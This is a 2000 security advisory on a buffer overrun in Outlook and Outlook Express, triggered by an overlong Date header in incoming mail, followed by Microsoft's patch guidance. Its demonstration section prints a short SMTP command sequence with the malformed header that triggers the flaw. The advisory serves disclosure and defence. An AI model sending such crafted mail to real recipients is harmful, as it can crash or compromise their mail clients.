Unchecked Buffer in Outlook May Run Arbitrary Code

Reported July 19 by USSRLabs

VERSIONS AFFECTED
Microsoft Outlook Express 4.0 - 5.01
  • Microsoft Outlook 97, 98, and 2000

    DESCRIPTION

    An unchecked buffer in Outlook may allow a malformed date parameter to run arbitrary code to execute on the system. The overrun occurs when a string is appended to the end of the Date parameter in the SMTP mail header as seen in the example below.

    DEMONSTRATION

    The following series of SMTP mail commands will initiate the buffer overrun when the user receives the email via an unpatched version of Outlook:

    HELO
    MAIL FROM: someone@somedomain
    RCPT TO: target@someotherdomain
    DATA
    Date: Thu,19 Jul 2000  11:11:00
    +1111111111111111111111111111111111111111111111111111111111111
    .
    QUIT

    USSRLabs has also made available a series of client-side tools that demonstrate the problem:

    VENDOR RESPONSE

    Microsoft issued FAQ# FQ00-043 regarding this problem along with a patch and Support Online article Q267884, which also pertain to security issues MS00-043 and MS00-046.

    Microsoft"s bulletin states that "this vulnerability can be eliminated by taking any of the following actions:

    • Installing the patch available at
      http://www.microsoft.com/windows/ie/download/critical/patch9.htm
    • Performing a default installation of Internet Explorer 5.01 Service Pack 1,
      http://www.microsoft.com/Windows/ie/download/ie501sp1.htm.
    • Performing a default installation of Internet Explorer 5.5
      (http://www.microsoft.com/windows/ie/download/ie55.htm)
      on any system except Windows 2000.

    Note: The patch requires IE 4.01 SP2 (http://www.microsoft.com/windows/ie/download/ie401sp2.htm) or IE 5.01 (http://www.microsoft.com/windows/ie/download/ie501.htm) to install. Customers who install this patch on versions other than these may receive a message reading "This update does not need to be installed on this system". This message is incorrect. More information is available in KB article Q267884"

    CREDIT
    Discovered by USSRLabs